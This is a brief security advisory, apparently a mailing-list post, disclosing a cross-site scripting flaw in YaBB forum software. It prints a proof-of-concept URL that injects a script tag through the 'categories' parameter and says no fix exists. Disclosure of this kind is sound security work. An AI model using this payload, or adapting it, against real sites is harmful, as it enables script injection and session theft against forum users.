<<< Date Index >>>     <<< Thread Index >>>

Yabb XSS



###########################################################################################
#Aria-Security.net Advisory                                                     
          #
#Discovered  by: OUTLAW                                                         
          #
#< www.Aria-security.net >                                                      
          #
#Gr33t to: A.u.r.a  & C0d3r & l2odon & R@1D3N @ DrtRp &                         
          #
###########################################################################################
#Software: YaBB                                                                 
                   
#Attack method: Cross Site Scripting                                            
          
#                                                                               
          
#                                                                               
          
#Proof of Concept:                                                              
          
#                                                                               
          
#index.php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert("xss")</script>
       
#                                                                               
          
#----------------------------------------------------------                     
          
#                                                                               
          
#Solution                                                                       
          
#                                                                               
          
#No Solutions                                                                   
          
#                                                                               
          
#Contact : Outlaw@xxxxxxxxxxxxxxxxx                                             
          
#